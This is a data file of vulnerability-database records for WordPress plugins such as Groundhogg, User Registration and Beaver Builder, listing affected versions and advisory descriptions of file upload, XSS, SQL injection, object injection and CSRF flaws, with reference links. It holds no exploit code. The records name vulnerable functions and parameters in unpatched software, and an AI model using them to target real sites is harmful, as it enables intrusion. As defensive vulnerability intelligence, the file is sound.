{"CVE_ID":"CVE-2025-0394","slug":"groundhogg","versionImpact":"3.7.3.5","description":"The WordPress CRM, Email & Marketing Automation for WordPress | Award Winner \u2014 Groundhogg plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the gh_big_file_upload() function in all versions up to, and including, 3.7.3.5. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/3.7.3.5\\\/includes\\\/big-file-uploader.php#L117\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/groundhogg\\\/tags\\\/3.7.3.5\\\/includes\\\/big-file-uploader.php#L117\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221208\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221208\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/groundhogg\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/groundhogg\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2cf3b85-2e2d-43dc-9877-9a740d4fd2fb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2cf3b85-2e2d-43dc-9877-9a740d4fd2fb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4217","slug":"wp-youtube-video-optimizer","versionImpact":"1.2","description":"The WP YouTube Video Optimizer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ib_youtube' shortcode in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-youtube-video-optimizer\\\/trunk\\\/wp-youtube-video-optimizer.php#L20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-youtube-video-optimizer\\\/trunk\\\/wp-youtube-video-optimizer.php#L20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71a933ef-f49d-4520-90d5-9957f72d7452?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71a933ef-f49d-4520-90d5-9957f72d7452?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4608","slug":"structured-content","versionImpact":"1.6.4","description":"The Structured Content plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sc_fs_local_business shortcode in all versions up to, and including, 1.6.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/structured-content\\\/tags\\\/1.6.4\\\/class-structuredcontent.php#L188\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/structured-content\\\/tags\\\/1.6.4\\\/class-structuredcontent.php#L188\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/structured-content\\\/tags\\\/1.6.4\\\/templates\\\/shortcodes\\\/local-business.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/structured-content\\\/tags\\\/1.6.4\\\/templates\\\/shortcodes\\\/local-business.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/structured-content\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/structured-content\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8c60701-37f0-4404-b965-9136ac456e38?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8c60701-37f0-4404-b965-9136ac456e38?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28659","slug":"waiting","versionImpact":"0.6.2","description":"The Waiting: One-click Countdowns WordPress Plugin, version <= 0.6.2, is affected by an authenticated SQL injection vulnerability in the pbc_down[meta][id] parameter of the pbc_save_downs action.","refs":"[{\"url\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-2\",\"name\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1169","slug":"ooohboi-steroids-for-elementor","versionImpact":"2.1.4","description":"The OoohBoi Steroids for Elementor plugin for WordPress is vulnerable to missing authorization due to a missing capability check on the 'file_uploader_callback' function in versions up to, and including, 2.1.4. This makes it possible for subscriber-level attackers to upload image attachments to the site.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ooohboi-steroids-for-elementor\\\/tags\\\/2.1.3\\\/inc\\\/exopite-simple-options\\\/upload-class.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ooohboi-steroids-for-elementor\\\/tags\\\/2.1.3\\\/inc\\\/exopite-simple-options\\\/upload-class.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c56ed896-9267-49e6-a207-fe5362fe18cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c56ed896-9267-49e6-a207-fe5362fe18cd?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2888622\\\/ooohboi-steroids-for-elementor\\\/tags\\\/2.1.5\\\/inc\\\/exopite-simple-options\\\/upload-class.php?old=2874981&old_path=ooohboi-steroids-for-elementor%2Ftags%2F2.1.4%2Finc%2Fexopite-simple-options%2Fupload-class.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2888622\\\/ooohboi-steroids-for-elementor\\\/tags\\\/2.1.5\\\/inc\\\/exopite-simple-options\\\/upload-class.php?old=2874981&old_path=ooohboi-steroids-for-elementor%2Ftags%2F2.1.4%2Finc%2Fexopite-simple-options%2Fupload-class.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3343","slug":"user-registration","versionImpact":"3.0.1","description":"The User Registration plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 3.0.1 via deserialization of untrusted input from the 'profile-pic-url' parameter. This allows authenticated attackers, with subscriber-level permissions and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/tags\\\/3.0.1\\\/includes\\\/functions-ur-core.php#L3156\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/tags\\\/3.0.1\\\/includes\\\/functions-ur-core.php#L3156\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2932199\\\/user-registration\\\/trunk\\\/includes\\\/functions-ur-core.php#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2932199\\\/user-registration\\\/trunk\\\/includes\\\/functions-ur-core.php#file0\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3590277a-3319-4707-b728-d75ea59e8ad9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3590277a-3319-4707-b728-d75ea59e8ad9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4858","slug":"simple-table-manager","versionImpact":"1.5.6","description":"The Simple Table Manager WordPress plugin through 1.5.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/nightcloudos\\\/bug_report\\\/blob\\\/main\\\/vendors\\\/poc2.md\",\"name\":\"https:\\\/\\\/github.com\\\/nightcloudos\\\/bug_report\\\/blob\\\/main\\\/vendors\\\/poc2.md\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ef8029e0-9282-401a-a77d-10b6656adaa6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ef8029e0-9282-401a-a77d-10b6656adaa6\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1038","slug":"beaver-builder-lite-version","versionImpact":"2.7.4.2","description":"The Beaver Builder \u2013 WordPress Page Builder plugin for WordPress is vulnerable to DOM-Based Reflected Cross-Site Scripting via a 'playground.wordpress.net' parameter in all versions up to, and including, 2.7.4.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2cc2776-9496-42b5-a242-c572ae5462fb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2cc2776-9496-42b5-a242-c572ae5462fb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beaver-builder-lite-version\\\/tags\\\/2.7.4.2\\\/js\\\/fl-builder.js#L1578\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beaver-builder-lite-version\\\/tags\\\/2.7.4.2\\\/js\\\/fl-builder.js#L1578\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032809\\\/beaver-builder-lite-version\\\/tags\\\/2.7.4.3\\\/js\\\/fl-builder.js?old=3012561&old_path=beaver-builder-lite-version\\\/tags\\\/2.7.4.2\\\/js\\\/fl-builder.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032809\\\/beaver-builder-lite-version\\\/tags\\\/2.7.4.3\\\/js\\\/fl-builder.js?old=3012561&old_path=beaver-builder-lite-version\\\/tags\\\/2.7.4.2\\\/js\\\/fl-builder.js\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6956","slug":"easyazon","versionImpact":"5.1.0","description":"The EasyAzon \u2013 Amazon Associates Affiliate Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018easyazon-cloaking-locale\u2019 parameter in all versions up to, and including, 5.1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d13454c-0c46-4b16-8e0e-bbfcf2338230?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d13454c-0c46-4b16-8e0e-bbfcf2338230?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easyazon\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easyazon\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8916","slug":"suki-sites-import","versionImpact":"1.2.1","description":"The Suki Sites Import plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c6dd146-a99e-4317-a703-de34735317c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c6dd146-a99e-4317-a703-de34735317c8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/suki-sites-import\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/suki-sites-import\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0393","slug":"royal-elementor-addons","versionImpact":"1.7.1006","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.7.1006. This is due to missing or incorrect nonce validation on the wpr_filter_grid_posts() function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1006\\\/classes\\\/modules\\\/wpr-filter-grid-posts.php#L1260\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1006\\\/classes\\\/modules\\\/wpr-filter-grid-posts.php#L1260\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1006\\\/classes\\\/modules\\\/wpr-filter-grid-posts.php#L391\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1006\\\/classes\\\/modules\\\/wpr-filter-grid-posts.php#L391\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3220959\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3220959\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/royal-elementor-addons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/royal-elementor-addons\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8e34c05-7431-4acd-91f3-aab5e66f61ad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8e34c05-7431-4acd-91f3-aab5e66f61ad?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0861","slug":"vr-frases","versionImpact":"3.0.1","description":"The VR-Frases (collect & share quotes) plugin for WordPress is vulnerable to SQL Injection via several parameters in all versions up to, and including, 3.0.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/vr-frases\\\/tags\\\/3.0.1\\\/includes\\\/vr-frases-admin.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/vr-frases\\\/tags\\\/3.0.1\\\/includes\\\/vr-frases-admin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d9d5afb-d38d-442c-8511-f1683739a1da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d9d5afb-d38d-442c-8511-f1683739a1da?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32569","slug":"posts-table-filterable","versionImpact":"1.0.4","description":"Deserialization of Untrusted Data vulnerability in RealMag777 TableOn \u2013 WordPress Posts Table Filterable allows Object Injection. This issue affects TableOn \u2013 WordPress Posts Table Filterable: from n\/a through 1.0.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/posts-table-filterable\\\/vulnerability\\\/wordpress-tableon-plugin-1-0-2-php-object-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/posts-table-filterable\\\/vulnerability\\\/wordpress-tableon-plugin-1-0-2-php-object-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1454","slug":"ninja-page-categories-and-tags","versionImpact":"1.4.2","description":"The Ninja Pages WordPress plugin through 1.4.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0089f813-82fa-4ffc-acd6-a70e67edc8ea\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0089f813-82fa-4ffc-acd6-a70e67edc8ea\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-53270","slug":"easy-sticky-sidebar","versionImpact":"1.6.9","description":"Cross-Site Request Forgery (CSRF) vulnerability in Blend Media WordPress CTA allows Cross Site Request Forgery. This issue affects WordPress CTA: from n\/a through 1.6.9.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/easy-sticky-sidebar\\\/vulnerability\\\/wordpress-cta-plugin-1-6-9-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/easy-sticky-sidebar\\\/vulnerability\\\/wordpress-cta-plugin-1-6-9-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3669","slug":"supreme-addons-for-beaver-builder-lite","versionImpact":"1.0.9","description":"The Supreme Addons for Beaver Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's auto_qrcodesabb shortcode in all versions up to, and including, 1.0.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/supreme-addons-for-beaver-builder-lite\\\/tags\\\/1.0.9\\\/modules\\\/QR-Code\\\/QR-Code.php#L102\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/supreme-addons-for-beaver-builder-lite\\\/tags\\\/1.0.9\\\/modules\\\/QR-Code\\\/QR-Code.php#L102\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/supreme-addons-for-beaver-builder-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/supreme-addons-for-beaver-builder-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/904ba3ec-efde-424c-a50b-2ce71ad91ca5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/904ba3ec-efde-424c-a50b-2ce71ad91ca5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-26008","slug":"top-10","versionImpact":"3.2.4","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Ajay D'Souza Top 10 \u2013 Popular posts plugin for WordPress plugin <= 3.2.4 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/top-10\\\/wordpress-top-10-plugin-3-2-4-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/top-10\\\/wordpress-top-10-plugin-3-2-4-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2498","slug":"go_pricing","versionImpact":"3.3.19","description":"The Go Pricing - WordPress Responsive Pricing Tables plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 3.3.19 due to insufficient input sanitization and output escaping. This makes it possible for contributor-level attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c3d4c96-63a7-4f3b-a9ac-095be241f840?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c3d4c96-63a7-4f3b-a9ac-095be241f840?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/go-pricing-wordpress-responsive-pricing-tables\\\/3725820\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/go-pricing-wordpress-responsive-pricing-tables\\\/3725820\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1016","slug":"intuitive-custom-post-order","versionImpact":"3.1.3","description":"The Intuitive Custom Post Order plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.1.3, due to insufficient escaping on the user supplied 'objects' and 'tags' parameters and lack of sufficient preparation in the 'update_options' function as well as the 'refresh' function which runs queries on the same values. This allows authenticated attackers, with administrator permissions, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. Note that this attack may only be practical on configurations where it is possible to bypass addslashes due to the database using a nonstandard character set such as GBK.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc878508-200d-4bc7-aa99-c34e63cba4b3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc878508-200d-4bc7-aa99-c34e63cba4b3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/intuitive-custom-post-order\\\/trunk\\\/intuitive-custom-post-order.php?rev=2530122\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/intuitive-custom-post-order\\\/trunk\\\/intuitive-custom-post-order.php?rev=2530122\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3342","slug":"user-registration","versionImpact":"3.0.2","description":"The User Registration plugin for WordPress is vulnerable to arbitrary file uploads due to a hardcoded encryption key and missing file type validation on the 'ur_upload_profile_pic' function in versions up to, and including, 3.0.2. This makes it possible for authenticated attackers with subscriber-level capabilities or above to upload arbitrary files on the affected site's server which may make remote code execution possible. This was partially patched in version 3.0.2 and fully patched in version 3.0.2.1.","refs":"[{\"url\":\"https:\\\/\\\/lana.codes\\\/lanavdb\\\/c0a58dff-7a5b-4cc0-82d6-2255e61d801c\\\/\",\"name\":\"https:\\\/\\\/lana.codes\\\/lanavdb\\\/c0a58dff-7a5b-4cc0-82d6-2255e61d801c\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/tags\\\/3.0.1\\\/includes\\\/functions-ur-core.php#L3156\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/tags\\\/3.0.1\\\/includes\\\/functions-ur-core.php#L3156\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a979e885-f7dd-4616-a881-64f3d97c309d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a979e885-f7dd-4616-a881-64f3d97c309d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2933689\\\/user-registration\\\/trunk\\\/includes\\\/functions-ur-core.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2933689\\\/user-registration\\\/trunk\\\/includes\\\/functions-ur-core.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1341","slug":"advanced-iframe","versionImpact":"2024.1","description":"The Advanced iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's advanced_iframe shortcode in all versions up to, and including, 2024.1 due to the plugin allowing users to include JS files from external sources through the additional_js attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/699e5c80-8a11-4f67-8b17-41170d9c6411?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/699e5c80-8a11-4f67-8b17-41170d9c6411?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3042304%40advanced-iframe&new=3042304%40advanced-iframe&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3042304%40advanced-iframe&new=3042304%40advanced-iframe&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0976","slug":"wp-event-manager","versionImpact":"3.1.41","description":"The WP Event Manager \u2013 Events Calendar, Registrations, Sell Tickets with WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the plugin parameter in all versions up to, and including, 3.1.41 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d7f4d17-8318-4ab3-b4a2-81d7a017c397?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d7f4d17-8318-4ab3-b4a2-81d7a017c397?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-manager\\\/trunk\\\/admin\\\/wp-event-manager-shortcode-list.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-manager\\\/trunk\\\/admin\\\/wp-event-manager-shortcode-list.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3039683\\\/wp-event-manager\\\/trunk\\\/admin\\\/wp-event-manager-shortcode-list.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3039683\\\/wp-event-manager\\\/trunk\\\/admin\\\/wp-event-manager-shortcode-list.php\",\"refsource\":\"\",\"tags\":[]}]"}
